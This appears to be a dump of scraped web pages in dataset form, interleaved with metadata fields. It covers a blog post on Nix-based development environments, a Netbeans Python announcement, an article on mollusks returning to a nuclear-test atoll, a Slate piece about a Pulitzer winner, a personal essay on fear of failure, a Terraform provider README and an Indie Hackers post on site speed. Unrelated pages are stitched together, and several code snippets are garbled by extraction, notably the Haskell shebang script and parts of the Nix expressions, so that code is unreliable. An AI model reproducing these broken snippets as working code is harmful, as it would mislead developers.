there are also wrapper functions around generators, which
saves you from having to *use* the generators themselves, One example of this is
`callCabal2nix`
used for building `Haskell`
packages.
Here’s a list of a few assorted generators for different project types:
- node2nix: Generate
`Nix`
derivations to build`npm`
packages. - setup.nix: Generate
`Nix`
derivations for`Python`
packages. - cabal2nix: Generate
`Nix`
derivations from a`.cabal`
file.
### Pinning `nixpkgs`
The package repository `nixpkgs`
is based on the concept of channels. Channels
are basically branches of development in the `git`
repository moving the
contained `Nix`
expressions forward by updating upstream versions, fixing bugs
and security issues, and provide new `Nix`
utilities. Channels are also moving
targets. System *users* want to automatically receive security updates, new
application versions, and so on. Software developers on the other hand want to
control the upgrade of dependencies in a controlled manner.
The `Nix`
way of locking down dependencies is to pin the `nixpkgs`
versions. In
essence this is to use a version of `nixpkgs`
from a specific commit, a
snapshot. This ensures that building the `Nix`
derivation will always result in
the same output, regardless of future upstream changes to `nixpkgs`
. Different
derivations may also use different versions of `nixpkgs`
without that
necessarily becoming an issue. To upgrade one or more dependencies it is often
enough to just change the snapshot of `nixpkgs`
to a newer version.
### Haskell
`Haskell`
projects are typically built using `cabal`
. `stack`
is another popular
tool, which manages package sets of `GHC`
versions along with compatible
`Haskell`
packages. Gabriel Gonzales’ writeup of Nix and Haskell in production
state that `Nix`
is not a replacement for `cabal`
, but rather a `stack`
replacement.
`Nix`
has become quite popular in the `Haskell`
community and it seems many
people choose it to build their projects. In a way similar to Stackage,
`nixpkgs`
contains package sets build for different versions of `ghc`
6.
There’s a section in the `nixpkgs`
manual under “User’s Guide to the Haskell Infrastructure” providing some information on how to use `Nix`
for `Haskell`
.
I used `stack`
for all `Haskell`
development I’d been doing leading up to my
switch to `NixOS`
, and so it felt natural to continue using `stack`
under `Nix`
.
`stack`
even has native Nix support. However, since there’s quite a bit of
overlap what `stack`
and `Nix`
attempts to solve, I’ve since switched my
workflow over to `Nix`
and just `cabal`
. `nixpkgs`
provide a `callCabal2nix`
function which in short suffices to setup a simple project. Following are a few
hobby projects which I’ve recently switched over to this model:
#### nixon - `Nix`
-aware project environment launcher
Using either rofi or fzf, `nixon`
selects projects from predefined directories
and launches `nix-shell`
(or other commands) in the project’s environment. This
is very useful when projects have `.nix`
files setting up shell environments in
which you want to spawn a terminal, an editor, run compilation commands, and so
on.
This project uses a single `default.nix`
file which also works by creating a
shell environment with additional developer tools when run in `nix-shell`
:
`default.nix`
:
```
{
pkgs ? import ./nixpkgs.nix {},
haskellPackages ? pkgs.haskellPackages,
}:
let
gitignore = pkgs.nix-gitignore.gitignoreSourcePure [ ./.gitignore ];
in haskellPackages.mkDerivation {
pname = "nixon";
version = "0.1.0.0";
src = (gitignore ./.);
isLibrary = true;
isExecutable = true;
executableHaskellDepends = with haskellPackages; [
aeson
base
bytestring
containers
directory
foldl
haskeline
process
text
transformers
turtle
unix
unordered-containers
wordexp];
executableSystemDepends = with pkgs; [
fzf
rofi];
testDepends = with haskellPackages; [
hspec];
license = pkgs.stdenv.lib.licenses.mit;
}
```
`shell.nix`
:
```
{
pkgs ? import ./nixpkgs.nix {},
haskellPackages ? pkgs.haskellPackages,
}:
let
drv = (import ./default.nix) {
inherit pkgs haskellPackages;
};
in haskellPackages.shellFor {
packages = _: [ drv ];
buildInputs = (with pkgs; [
cabal2nix
cabal-install
hlint]) ++ (with haskellPackages; [
ghcid]);
}
```
In short, to define the derivation (`drv`
) I’m using the `Haskell`
specialization of `mkDerivation`
in `haskellPackages.mkDerivation`
. It also
makes use of `haskellPackages.shellFor`
to setup a shell environment used when
developing. This shell includes `cabal2nix`
, `cabal`
, `hlint`
, and `ghcid`
.
#### i3ws - Automatic workspace management in i3.
This project is interesting because the project was using `stack`
in a monorepo
style layout before switching to `Nix`
. This meant that I had to find a nice way
to have several packages under development integrating nicely in `Nix`
. Luckily
somebody beat me to it, and I drew some inspiration from the “Nix + Haskell monorepo tutorial” post on the `NixOS`
`discourse`
, pointing to the
nix-haskell-monorepo `GitHub`
repo.
The new-style commands of `cabal`
supports multiple projects using a
`cabal.project`
file. This file contains a listing of the
packages/subdirectories contained in the project, each with their own `.cabal`
file:
```
$ cat cabal.project
packages: foo
bar
baz
```
For a working example of this setup, see the GitHub repo7 for `i3ws`
.
### Python
We use `Python`
extensively at work, and our most active codebase is a web
application with a `Python`
backend and a `JavaScript/TypeScript`
frontend.
It was this project I first tried to get working on my laptop after switching it
to `NixOS`
. We use some automation scripts which call out to `pip`
and `yarn`
to
install dependencies.
This is not a trivial project, but still I find the `shell.nix`
file I use to
setup the environment to not be very large. It is worth noting that we do not
build and deploy this project using `Nix`
, and so the expression is *only*
setting up enough for me to successfully run our install, testing and packaging
scripts:
```
{
pkgs ? import (fetchTarball {
url = "https://github.com/NixOS/nixpkgs/archive/19.09.tar.gz";
sha256 = "0mhqhq21y5vrr1f30qd2bvydv4bbbslvyzclhw0kdxmkgg3z4c92";
}) {},
}:
let
# Pin Pillow to v6.0.0
pillowOverride = ps: with ps; pillow.override {
buildPythonPackage = attrs: buildPythonPackage (attrs // rec {
pname = "Pillow";
version = "6.0.0";
src = fetchPypi {
inherit pname version;
sha256 = "809c0a2ce9032cbcd7b5313f71af4bdc5c8c771cb86eb7559afd954cab82ebb5";
};
});
};
venv = "./venv";
in self.mkShell {
buildInputs = with pkgs; [
binutils
gcc
gnumake
libffi.dev
libjpeg.dev
libxslt.dev
nodejs
openssl.dev(python36.withPackages (ps: with ps; [
(pillowOverride ps)
pip
python-language-server
virtualenv]))
squashfsTools
sshpass
yarn
zip
zlib.dev];
shellHook = ''
# For using Python wheels
export SOURCE_DATE_EPOCH="$(date +%s)"
# https://github.com/NixOS/nixpkgs/issues/66366
export PYTHONEXECUTABLE=${venv}/bin/python
export PYTHONPATH=${python}/lib/python3.7/site-packages
if [ -d ${venv} ]; then
source ${venv}/bin/activate
fi
'';
};
```
First of all, none of the other developers on the team use `Nix`
8, which means I
have to add my `Nix`
configuration without being too intrusive on the others. I
also want to make sure I don’t deviate too much from the rest, leading to issues
caused by differences in my environment. We also have several scripts and
workflows centered around some of these tools, like automating dependency
installation across multiple sub-projects, package introspection, and ```
yarn
workspace
```
symlinking, to name a few.
I could go on a digression as to how `NixOS`
breaks the Filesystem Hierarchy Standard of `Linux`
, but essentially it means that libraries and executables are
not found in standard locations. `Pillow`
uses some hardcoded paths in its
`setup.py`
which point to invalid locations on `NixOS`
. That makes it hard to
install it using `pip`
, and so it’s the only `Python`
dependency installed from
`nixpkgs`
. Overriding it to pin it to the version we are using, which ensures
`pip`
is not going to try to install another version by itself. In the end this
works well, but I spent *a lot* of time trying to do this in several other ways.
In my quest to get `Pillow`
working nicely in our project I had to dive through
the `nixpkgs`
codebase. At which point I got more aware of all the helpers
functions in that repository for building projects of different shapes and
sizes. What `buildPythonPackage`
does should be obvious from its name, but I
found that figuring out usage, differences, and even discovering of all these
different utilities within `nixpkgs`
is not very easy. Much improvement could be
made in the `Nix`
community on this front.
### JavaScript & TypeScript
The `Node.js`
packages in `nixpkgs`
are mainly *end user* packages. Some few
`nodejs`
libraries are present because they are dependencies of non-NPM packages.
The `nixpkgs`
docs has a section on Node.js packages. The recommendation is to
use the `node2nix`
generator directly on a project’s `package.json`
file. Here’s
a short list of possible generators for `Node.js`
packages:
For simpler setups I prefer to use `Nix`
to only provide `node`
, `npm`
, and
`yarn`
, then invoke these directly as it seems to work fine in most scenarios. I
haven’t had much reason for using `node2nix`
yet, so I can’t say much about that
experience.
One thing I typically do in my `JavaScript/TypeScript`
environments is to
include the `javascript-typescript-langserver`
package, which is used by
`lsp-mode`
in `Emacs`
to provide IDE-like tools.
### Ad-hoc environments
Sometimes you want access to certain language tools in order to test something.
While on other systems you typically have `node`
or `python`
installed somewhere
directly accessible on the shell, in `NixOS`
this isn’t the case. Instead, by
adding a few expressions to the `nixpkgs`
configuration file it’s easy to launch
shells with access to these tools.
#### Using `nix-shell`
to run scripts
`nix-shell`
also has support for being used in shebangs, making it ideal for
setting up ad-hoc environments used by simple scripts. The following example
instructs `nix-shell`
to create a `Haskell`
environment with `GHC`
along with a
predefined package turtle.
```
#! /usr/bin/env nix-shell
#! nix-shell -p "haskellPackages.ghcWithPackages (ps: with ps; [turtle])"
#! nix-shell -i runghc
{-# LANGUAGE OverloadedStrings #-}
import Turtle
main :: IO ()
= do
main "Hello, World!" echo
```
#### Pre-defined environments
Using `Nix`
overlays we can also define environments which can be referenced in
`nix-shell`
invocations to provide ad-hoc environments when testing out things.
Overlays are a way in `nixpkgs`
to define new packages and overrides to existing
packages. It’s a powerful concept, but here we’re using it just to create our
own derivations:
Node.js
Define
`env-node`
as an overlay in`~/.config/nixpkgs/overlays.nix`
:`let overlay = self: super: { nodeEnv = with self; buildEnv { name = "env-node"; paths = [ -10_x nodejs nodePackages_10_x.javascript-typescript-langserver yarn]; }; }; in [overlay]`
Launching the environment:
`$ nix-shell -p nodeEnv [nix-shell:~]$ node --version v10.15.3 [nix-shell:~]$ npm --version 6.4.1 [nix-shell:~]$ yarn --version 1.13.0 [nix-shell:~]$`
Python
Similarly to
`nodeEnv`
, define an overlay in`~/.config/nixpkgs/overlays.nix`
:`let overlay = self: super: { pythonEnv = with self; buildEnv { name = "env-python"; paths = [ (python3.withPackages (ps: with ps; [ pip virtualenv])) ]; }; }; in [overlay]`
Launching the environment (here we’re also adding
`ipython`
manually):`❯ nix-shell -p pythonEnv -p python3Packages.ipython [nix-shell:~]$ python --version Python 3.7.3 [nix-shell:~]$ ipython Python 3.7.3 (default, Mar 25 2019, 20:59:09) Type 'copyright', 'credits' or 'license' for more information IPython 7.2.0 -- An enhanced Interactive Python. Type '?' for help. In [1]:`
## Summary
In hindsight I should have known attempting to write a post like this would be
opening a can of worms. Well, my setup and configurations *did* end up changing
parallel to writing this post, and so time dragged on. Also, nailing the scope
of something as broad as this is not easy and I feel I’ve only managed to scrape
the surface of describing development on `NixOS`
(or using just `Nix`
, the package
manager).
Development based around `Nix`
can be a very powerful thing indeed, but don’t
expect it to be a walk in the park. I see the lack of proper documentation and
poor discoverability as one of the main hurdles `Nix`
and `nixpkgs`
has to
overcome. Again, `nixpkgs`
is a *huge* collection of `Nix`
expressions for
applications, libraries, and tools ranging across many different programming
languages and ecosystems. I think because of both the size of the repository and
the diversity of its content, there has evolved certain idioms *within*
different areas of the `nixpkgs`
repo. This makes finding the correct functions
and utilities to use for building a certain project harder for newcomers (and
perhaps even seasoned `Nix`
-ers).
Despite some of these areas of improvement I’m conviced that the concepts
pioneered by `Nix`
is here to stay. I have yet to find better alternatives for
managing the complexity of building and distributing software.
Finally I’d like to thank Bjørnar Snoksrud @snoksrud for proofreading.
## Footnotes
To provide an example of this
`npm`
introduced`npm-shrinkwrap.json`
and later`package-lock.json`
files to lock down the entire dependency tree of a project.↩︎No tool
*I’m*aware of, that is.↩︎Nix has plenty shortcomings though, and there are definitely ways to mess up a reproducible build by relying on e.g. the file system or hardcoded paths.↩︎
By “free” I’m not trying to undermine the amount of effort and hard work of developers, as well as the cost and computing power required to provide a much appreciated, fully-populated binary cache.↩︎
`stack`
doesn’t market itself as a package manager, but that’s besides the point.↩︎See: https://github.com/NixOS/nixpkgs/blob/master/pkgs/top-level/haskell-packages.nix↩︎
Linked to the commit at the time of writing.
`master`
might move away from this design at a later time.↩︎I’m hoping I’ll be able to convince them how useful
`Nix`
is.↩︎ | true | true | true | null | 2024-10-12 00:00:00 | 2019-07-01 00:00:00 | null | null | null | myme.no | null | null |
369,502 | http://codesnakes.blogspot.com/2008/11/python-comes-to-netbeans-today.html | Python comes to Netbeans today. | Alley | ## Tuesday, November 18, 2008
### Python comes to Netbeans today.
The time has come. Python support is available for Netbeans.
Download it, Have fun with it.
http://download.netbeans.org/netbeans/6.5/python/ea/
Now I need to look forward to version 7 and getting it final.
I will create a video developing a django project with Netbeans shortly
Thanks for all your support,
Allan
Subscribe to:
Post Comments (Atom)
## 5 comments:
yeahh very nicee :D
congratulations again
cant wait to see that django video ;)
why python came after ruby I am not sure
excelent work, is there a plugin for django? where i can get it?
thanks for sharing this site. there are various kinds of ebooks available from here
http://feboook.blogspot.com
Post a Comment | true | true | true | The time has come. Python support is available for Netbeans. Download it, Have fun with it. http://download.netbeans.org/netbeans/6.5/python... | 2024-10-12 00:00:00 | 2008-11-18 00:00:00 | null | blogspot.com | codesnakes.blogspot.com | null | null |
|
10,274,502 | http://www.atlasobscura.com/articles/how-the-miracle-mollusks-of-fangataufa-came-back-after-a-nuclear-blast | How the Miracle Mollusks of Fangataufa Came Back After a Nuclear Blast | Damaris Colhoun | # How the Miracle Mollusks of Fangataufa Came Back After a Nuclear Blast
In the 1960s and 70s, France conducted 193 nuclear tests in French Polynesia, transforming this stretch of paradise into a field of blooming mushroom clouds.
The largest of these blasts occurred in 1968, when the French government detonated a hydrogen bomb on the Fangataufa atoll, a small, enclosed coral reef that forms a lagoon, almost like a bathtub, in the middle of the ocean. Sacrificed at the altar of global security, at the peak of Cold War paranoia, the reef was singed to a crisp.
“This was a much bigger blast than the others and it was done at low tide,” says Pierre Legendre, a statistical ecologist at the University of Montreal who has been collecting and analyzing data on Fangataufa since 1997. This meant that most of the vegetation was incinerated and “virtually every mollusk was fried.”
Fangataufa and other nearby atolls were selected for the testing because they were so remote, but the radioactive fallout traveled further than expected. According to recently declassified documents, the tests exposed Tahiti to 500 times the maximum level of radiation, and also affected Bora Bora, an island that’s popular with honeymooners. Forty-five years later, Polynesia suffers from a high incidence of thyroid cancer and leukemia, and thousands of veterans and civilians are still battling for compensation over health issues.
In light of this toxic seepage, it seems that an epicenter like Fangataufa should have been obliterated, or least remain a dead zone. And yet the opposite is true. After surveying the atoll for more than 30 years, scientist Bernard Salvat, who later hired Legendre to analyze his findings, say that its mosses and plants have returned. Even more remarkable is that the mollusks who were fried on its rocky perimeter back in 1968—mollusks that Salvat has been studying since before the tests occurred—have also made something of a comeback.
The resurgence of the mollusks is the subject of Salvat and Legendre’s newly published study. The first of its kind to ever appear in public scientific literature, the paper analyzes 30 years of data that Savat collected from the hydrogen-blasted rocks of Fangataufa, using Legendre’s statistical methods. And it seeks to answer one of the fundamental questions of modern life: what happens after nuclear annihilation? How does nature respond? If it comes back, will it be different, and how?
The answer, say Salvat and Legendre, doesn’t just lie with fate, or the strength of a species, or natural design. It boils down to something more random. If the resurgence of the mollusks was a miracle, it was a miracle of chance.
The story of the mollusks begins far from the atolls of Polynesia, in a school of practical studies in Paris, where Savat was teaching oceanography back in 1966. The young researcher had already made a name for himself as one of the few researchers in the nation to have studied at New Caledonia, home of some of the world’s largest enclosed reefs. Savat had also become friendly with the director of the Museum of Natural History, who worked just down the street, and he was working with the Direction des Centres d’Experimentation Nucleaires (DIRCEN), established to administer nuclear testing.
So when one of the DIRCEN committees began casting about for a researcher to do surveys on one enclosed reef in French Polynesia that would soon be used for nuclear testing, Savat was the obvious choice. Along with two other researchers (one who studied fish, another who studied coral), Savat was tapped to survey Fangataufa’s mollusks, before and after the blasts.
Savat immediately saw the offer for what it was: a rare opportunity to study primary succession—that is, what happens ecologically and biologically in the wake of total destruction. It’s a subject most scientists don’t get to study, because it’s hard to create total destruction under experimental conditions.
“I can’t go to the funding agency here in Canada and say, ‘I’m going to destroy the vegetation for the animals on an island, especially with an atomic bomb, in order to study succession,’” Legendre says. “They would reject my grant, and they would be right, because it would be immoral. So Bernard knew he had the chance to study what would be impossible in normal scientific contexts. This makes our data unique in the world.”
Savat’s expeditions to Fangataufa began in 1967. He returned again in 1968 and 1970, and then again in 1972, after the testing on Fangataufa was complete. He fixed rope ladders to the reefs so he could anchor himself during dives. He explored the atoll and its neighbors in a nimble inflatable boat. At some point, the other two researchers abandoned their projects, after finding that much of the fish and coral had been protected from the blast by the water, making it difficult to study their recovery in any concrete way.
The mollusks, however, made excellent subjects. Unlike fish, they are slow moving, easy to identify, and can live in the shallowest waters, making them easy to study. They also have relatively long lifespans—a mollusk lives up to ten years—so the generational turnover in any given spot is relatively low. All of these characteristics made it easier to observe what happened to them after the blasts.
By 1997, Savat had conducted eight field surveys on the reef, at which point he hired Legendre to analyze his data.
The mollusks’ resurgence, their research shows, happened surprisingly quickly. As early as 1972, mollusks had begun to cluster along the rocks, recolonizing the tide pools and upper reaches of the reef. To the untrained eye, it looked as though the same populations of mollusks were coming back. But they were different than before.
Mollusks reproduce by sending their larvae out into the ocean, where they ride the waves and currents for up to thousands of miles, like a scene from “Finding Nemo.” Most of these larvae get eaten by fish and other creatures, but the lucky ones will eventually run into an island, or a reef. As soon as they make contact, they stick out their toes and attach.
This means that the new mollusks of Fangataufa didn’t rise up from the nuclear ashes, like mini shelled phoenixes. Instead, they came by way of waves, drifting from other islands and reefs that may have been thousands of miles away. Unlike the animals of Chernobyl, which were affected by the radiation for generations, the mollusk larvae were genetically fresh.
Many were also different species than the ones before the tests. And this is where the study gets controversial. For years, most ecologists believed that species were controlled exclusively by environmental conditions—in other words, a species lives where the environmental conditions suit them best. Ecologists call this species sorting, and it was the dominant theoretical paradigm when Legendre began his career.
Then in 2001, an ecologist named Stephen Hubbell, whose specialty was tropical forests, hypothesized that where a species settles isn’t determined only by environmental conditions—in fact, Hubbell said it was much more random than that. Citing ideas like “random drift,” and suggesting that every species takes a “random walk” to determine where it lives, Hubbell called this hypothesis the unified neutral theory of biodiversity.
Legendre helped explain. “Imagine how the cloud transmits data to your computer. It’s about the same with the neutral theory. There are organisms in the cloud and some of them settle in the area that you are studying. Some may be happy there, some may be marginally happy there, and others don’t settle there at all. So there is a big random component to the process.”
Hubbell’s theory has been heavily debated, with ecologists arguing that not every species has an equal chance of colonizing. And even Hubbell was skeptical of Savat and Legendre’s results: “On the face of it, certainly [the results] are consistent with it, but it doesn’t in my opinion prove it. It isn’t a slam dunk,” he told *Science Magazine.*
Still, the mollusks of Fangataufa offer compelling evidence that their arrival was a matter of chance. After sampling three different portions of the reef, Savat and Legendre found that only three out of 36 species of mollusks were the same as the ones that had been there before the blasts. Meanwhile, on the other two portions of the reef, the composition of species had changed completely, and were also completely different from each other.
“Over the course of many years of surveys, we found the mix of species slowly changed,” Legendre says. “The mollusks that were there at the beginning, lived about 10 years, and were then replaced by new larvae coming in from the ocean.” It’s a process, then, that will continue to occur, as long as Fangataufa remains and there are mollusks around to run into it.
Legendre’s observation seems like “random drift” in action. And the fact that some of the mollusks were eking out a living in sub-ideal conditions seems to support that idea that not every species gets to live in a place that suits them best. Some of the plant-eating mollusks, for instance, had colonized a higher portion of the reef that was especially harsh and dry. Here, they spent three weeks of every month surviving off what little bit of water they had captured in their shells, while they waited for the next full moon to usher in the tide.
If the story behind these mollusks is starting to sound more existential than miraculous, Legendre might agree: “They settled in that way by chance when they encountered the hard substrate,” he says of the mollusks high on the reef. “It’s not ideal, but of course it is better for them than just floating in the ocean, where they would be eaten by the next fish that comes along.”
Follow us on Twitter to get the latest on the world's hidden wonders.
Like us on Facebook to get the latest on the world's hidden wonders.
Follow us on Twitter Like us on Facebook | true | true | true | In the 1960s and 70s, France conducted 193 nuclear tests in French Polynesia, transforming this stretch of paradise into a field of blooming mushroom clouds. | 2024-10-12 00:00:00 | 2015-09-24 00:00:00 | article | atlasobscura.com | Atlas Obscura | null | null |
|
7,154,591 | http://www.foreignpolicy.com/articles/2014/01/28/oil_pirates_and_the_mystery_ship | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
18,185,238 | https://montel.io/fear-of-failure/ | Why I'm scared of failure · Montel.io | null | After executing on my first projects, I realized why I’m afraid of failure.
## I actually fear reality
When you are dreaming about your project, everything always feels right. Sure there is some work involved, but in the end, the result is stunning. It feels good to think about your project because you picture yourself in your dream.
When you think about making anything: a blog, a Youtube channel, a startup, a book, a song, it’s like Schrödinger’s cat.
If you don’t open the box, the cat is not dead yet. Before you ship your project, there is still this possibility to reach your dream.
When you execute, you open the box on your dream. You find out how your cat looks. And it hurts because it’s never as beautiful as you imagined. The cat is somewhat ugly and sick compared to your dream cat.
It doesn’t hurt because the cat is dead. It hurts because you have a proof that you will never see your dream cat in reality.
When I am done writing this article, it will never look as moving and enlightened as I had imagined it when I first opened my text editor.
## It challenges my ego
When you realize you will never be able to realize your dream, it challenges how you see yourself. Each setback questions your identity, and your future.
In May I was coding the first lines of Threadhunt from a hotel room in Ubud, Bali. It was one of my first attempts at coding a side project in Node. I was struggling to setup login and authentication and wasted the whole afternoon looking for an answer, and I didn’t find it.
So I was feeling completely down: I can’t even make a fucking login! And I’m even contemplating the idea of making money one day from this side project? I’m a crappy developer and will never make anything significant! My life is probably going to end up miserable at some point.
The problem is to extrapolate the short term setback into a long term vision.
Here is how it looks:
When you’re in the middle of a dip you extrapolate and think about what it implies on the long term.
Segregate your project from yourself. Refuse to let your emotions challenge your identity
## How am I supposed to care less about what I do all the day?
I put all my weekend in this project, how am I supposed to make it secondary?
My take is to view it as a quest.
When you climb a mountain, you don’t really care about each individual step. Of course it’s better if you don’t trip, but the important thing is to get to the summit.
View your work as a long term search for quality.
You pulled out a crappy project. It’s ok, you just tripped on the way to the summit.
Don’t put too much importance in a single project.
When projects succeed or fail, they are just a source of feedback for your long term quest. How did you improve during this project?
For example if you’re a writer, your quest is the ability to convey emotions and meaning through words. If you’re a developer, your quest is the skill to make machines work for you efficiently.
When a single project doesn’t work out, think of it a part of the process, not as an event.
## How to remove ego from this quest?
I think you need to find another reason than yourself for this quest.
I feel when we are empty or don’t know what to do, we fill the void by distractions or ego. When you have a setback and you don’t have a framework to explain it, you fallback to your ego. You think you’re special and everything is related to you. When you have ambition and dreams of success, if you don’t know the why, you justify it by ego. You begin to think that you deserve it, that you are an over achiever, all that BS.
So what I suggest is to find another reason for your quest, that is not related to you.
As an author your mission is important because you change how people think, and you help them make better choices.
As a developer you make machines work instead of humans, so it’s about liberating people from boring work.
I’ll let you know how this works out for me. | true | true | true | After executing on my first projects, I realized why I’m afraid of failure. I actually fear reality When you are dreaming about your project, everything a | 2024-10-12 00:00:00 | 2018-10-10 00:00:00 | /extrapolate-the-dip.png | article | montel.io | Montel.io | null | null |
10,888,290 | http://victorsdiaz.com/testing-asp-net-mvc-view/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
12,618,540 | http://qz.com/797903/japanese-politicians-are-experiencing-pregnancy-to-urge-dads-to-help-out-at-home/ | Japan’s male politicians are experiencing pregnancy to urge dads to do more housework | Siyi Chen | In Japan, women do about five times as much housework as men. To encourage Japan’s salarymen to help out at home, the Kyushu Yamaguchi Work Life Promotion Campaign created a video that showed three male governors in Japan experiencing a day in the life of a pregnant woman. In the video, the politicians strap on a 16-pound vest to simulate pregnancy. Very quickly, they learn how even simple household tasks can be a major pain when carrying around that extra weight. | true | true | true | It's intended to promote more equality at home. | 2024-10-12 00:00:00 | 2016-10-01 00:00:00 | article | qz.com | Quartz | null | null |
|
5,260,193 | http://www.drdobbs.com/tdd-is-about-design-not-testing/229218691 | TDD Is About Design, Not Testing | Andrew Binstock; February | # TDD Is About Design, Not Testing
TDD is not a way to more-thoroughly test code, although it might have that result### Related Reading
### More Insights
INFO-LINK
To upload an avatar photo, first complete your Disqus profile. | View the list of supported HTML tags you can use to style comments. | Please read our commenting policy.
|
| | true | true | true | TDD is not a way to more-thoroughly test code, although it might have that result | 2024-10-12 00:00:00 | 2011-02-01 00:00:00 | http://i.cmpnet.com/ddj/digital/ddj.gif | article | drdobbs.com | Dr. Dobb's | null | null |
2,837,264 | http://thenextweb.com/us/2011/08/02/new-york-city-techstars-reality-tv-show-to-air-this-fall-on-bloomberg/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
9,413,925 | http://www.slate.com/blogs/moneybox/2015/04/20/daily_breeze_pulitzer_prize_one_of_the_winners_left_journalism_because_he.html | One of Monday’s Pulitzer Prize Winners Left Journalism Because It Couldn’t Pay His Rent. Now He’s in PR. | Jordan Weissmann | The* Daily Breeze*, a small newspaper in Torrance, California, with just 63,000 subscribers and seven metro reporters, was a surprise winner at today’s Pulitzer Prize ceremony, taking home the local reporting award for its investigation of corruption in a poor school district that brought down an exorbitantly paid superintendent and led to changes in state law.* According to Poynter, the big scoop started with some basic beat reporting, when *Daily Breeze *staffers Rob Kuznia and Rebecca Kimitch “began digging into administrator compensation records at Centinela Valley Union High School District.”
The win is a nice reminder that media types aren’t just paying lip service to an old ideal when they say local newspapers can really make a difference in the world. But it’s also a not-so-nice reminder of just how wretched the business of metro journalism truly is. According to *LA Observed*, Kuznia, whose work on the education beat started the whole effort, has apparently left the industry in order to actually support himself. He’s now in public relations.
We should note that Kuznia left the Breeze and journalism last year and is currently a publicist in the communications department of USC Shoah Foundation. I spoke with him this afternoon and he admitted to a twinge of regret at no longer being a journalist, but he said it was too difficult to make ends meet at the newspaper while renting in the LA area.
So, if there are any solvent metro newspapers around looking for a very capable reporter, it looks like there’s a stray Pulitzer winner sitting around. Just saying.
** Correction, April 20, 2015: This post originally misspelled Torrance, California.* | true | true | true | The Daily Breeze, a small newspaper in Torrance, California, with just 63,000 subscribers and seven metro reporters, was a surprise winner at today's... | 2024-10-12 00:00:00 | 2015-04-20 00:00:00 | article | slate.com | Slate | null | null |
|
12,331,469 | http://shiporgetoffthepot.com/summercampmba/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
3,660,982 | http://youknowyoureastartupfounderwhen.com/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
1,928,757 | http://blog.tvdeck.com/2010/11/steve-wozniak-talks-about-importance-of.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
38,808,734 | https://github.com/GK-Consulting/terraform-provider-astronomer | GitHub - GK-Consulting/terraform-provider-astronomer: Lifecycle management for Airflow clusters managed by Astronomer | GK-Consulting | GK Consulting is a DevOps / Infrastructure shop. We think Astronomer is the right choice for a company who doesn't want to deal with the organizational challenges of managing their own Airflow cluster. However, we didn't like the fact we couldn't provision it like all our other infrastructure - via Terraform. We built this provider so that it would benefit our clients and allow us to continue to adhere to best practices. We are committed to maintaining this repository - PRs are welcome.
Astronomer's API isn't out of beta yet but when it comes out of beta, we will bump our provider to v1.0 (along with any necessary changes).
Please drop us a line if you'd like support, or have other IaC / DevOps needs. We would love to connect and see how we can partner together.
- Clone the repository
- Enter the repository directory
- Build the provider using the Go
`install`
command:
`go install`
This provider uses Go modules. Please see the Go documentation for the most up to date information about using Go modules.
To add a new dependency `github.com/author/dependency`
to your Terraform provider:
```
go get github.com/author/dependency
go mod tidy
```
Then commit the changes to `go.mod`
and `go.sum`
.
You will need an Astronomer API token to use this provider. You'll either need to pass this into the provider via the `token`
parameter or you'll need to set the `ASTRONOMER_API_TOKEN`
correctly.
If you wish to work on the provider, you'll first need Go installed on your machine (see Requirements above).
To compile the provider, run `go install`
. This will build the provider and put the provider binary in the `$GOPATH/bin`
directory.
To generate or update documentation, run `go generate`
.
In order to run the full suite of Acceptance tests, run `make testacc`
.
*Note:* Acceptance tests create real resources, and often cost money to run.
`make testacc` | true | true | true | Lifecycle management for Airflow clusters managed by Astronomer - GK-Consulting/terraform-provider-astronomer | 2024-10-12 00:00:00 | 2023-12-21 00:00:00 | https://opengraph.githubassets.com/a1de86be084253995a6c993da70a0f34792809e3b17c0bafcd495732f8bdd397/GK-Consulting/terraform-provider-astronomer | object | github.com | GitHub | null | null |
24,640,434 | https://www.indiehackers.com/product/indie-hackers/improved-website-speed--MINh-5tcAnVczzqARIT | Improved Website Speed | Courtland Allen | Indie Hackers should be much faster nowadays… at least for some of you!
In the past week, the PageSpeed Insights score for our homepage on mobile jumped from **24** to **78**. On desktop it jumped from **40** to **97**. Not too shabby!
We had similar improvements on post pages, which are just as important (if not more): from **22** to **79** on mobile, and from **57** to **98** on desktop.
The vast majority of the speedup came from two improvements: (1) serving static pages, and (2) optimizing images.
Indie Hackers is a single-page application (SPA) with server-side rendering. When you visit the site, you have to wait a few seconds for the JS to build the single page app in your browser. For some routes we have server-side rendering, so at least you'll see the full page of HTML while the SPA boots up. On others, you just see a random quote to distract you from how slow it is. 😈
However, It turns out that static HTML is all we really need for anonymous visitors. They don't actually need the SPA to boot up. So I wrote some code that lives on the edge nodes of our CDN. It modifies the HTML response to simply strip out our SPA JS. It also strips out lots of JS and CSS that were only used for the SPA, and replaces them with smaller page-specific JS and CSS.
The result is that, for anonymous visitors, the homepage and post pages load almost instantaneously when they're cached in our CDN. They take a second to load when you get a cache miss, but I've set the cache to last for 7 days, so it should be rare for popular posts. I've also got some good cache invalidation going on, where I'll refresh a post page in the cache when it gets new comments, edited, upvoted, etc. This kind of stuff is a pain to code and maintain, but it's necessary for a dynamic site with lots of visitors to pages that change frequently.
Anyway, this was the vast majority of the speed improvement. In the future I'd like to do the same for logged-in users, but that's a bit trickier, since there's a ton of JS in the SPA that deals with logging you in and allowing you to interact with various components (e.g. leaving comments and upvoting things).
"But Courtland, why did you make IH a SPA to begin with?"
Because it was a fun hobby project when I started it, and I didn't know it would get big leave me alone okay jeez.
This was a relatively simple fix, but it took a while. When you upload an avatar to your IH profile, I've got some code it automatically resizes it down to 72x72 pixels. However, I never got around to wring similar code for product and group icons. And if you look at the homepage, it's absolutely littered with lots of these icons, which makes it bright and happy, but also super huge. If you're on a slow mobile connection, the last thing you want is to download 3MB of images every time you visit the site.
So I spent some time optimizing all of these images. First, instead of merely shrinking them to one size, I'm shrinking them to 3 different sizes, and using the smallest possible size wherever I can get away with it. For example, group icons have a 28x28 pixel size for use in the social feeds around the site:
Second, I'm also converting these images to WEBP, which is a better compression algorithm than both JPG and PNG. The homepage still has way too many images, but now they're just a few kilobytes each on average, whereas before they were often dozens or hundreds of kb each.
